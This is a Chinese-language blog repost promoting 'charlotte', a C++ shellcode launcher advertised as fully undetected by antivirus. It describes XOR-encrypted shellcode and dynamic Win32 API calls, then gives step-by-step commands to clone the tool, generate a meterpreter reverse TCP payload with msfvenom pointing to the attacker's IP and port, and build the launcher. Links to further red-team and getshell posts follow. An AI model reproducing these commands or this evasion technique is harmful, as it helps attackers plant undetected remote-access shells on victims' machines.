运维 · 2023年9月28日 0

完全未被检测到的shellcode启动器

2021年5月13日:
c++ shellcode启动器,截至2021513日,0/26完全未被检测到。win32 api函数的动态调用shellcode和函数名的异或加密每次运行随机XOR键和变量在KaliLinux上,只需'apt-get install mingw-w64*'就可以了!

2021年5月17日

随机字符串长度和XOR键长度

使用

git clone存储库,生成命名为beacon.bin的shellcode文件,然后运行charlotte.py

注:使用msfvenom -p测试以及CobaltStrike原始格式Payload!

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*cd charlottemsfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.binpython charlotte.py

下载地址


https://github.com/9emin1/charlotte

如有侵权,请联系删除

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器

关注我,学习网络安全不迷路

You may also like...

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注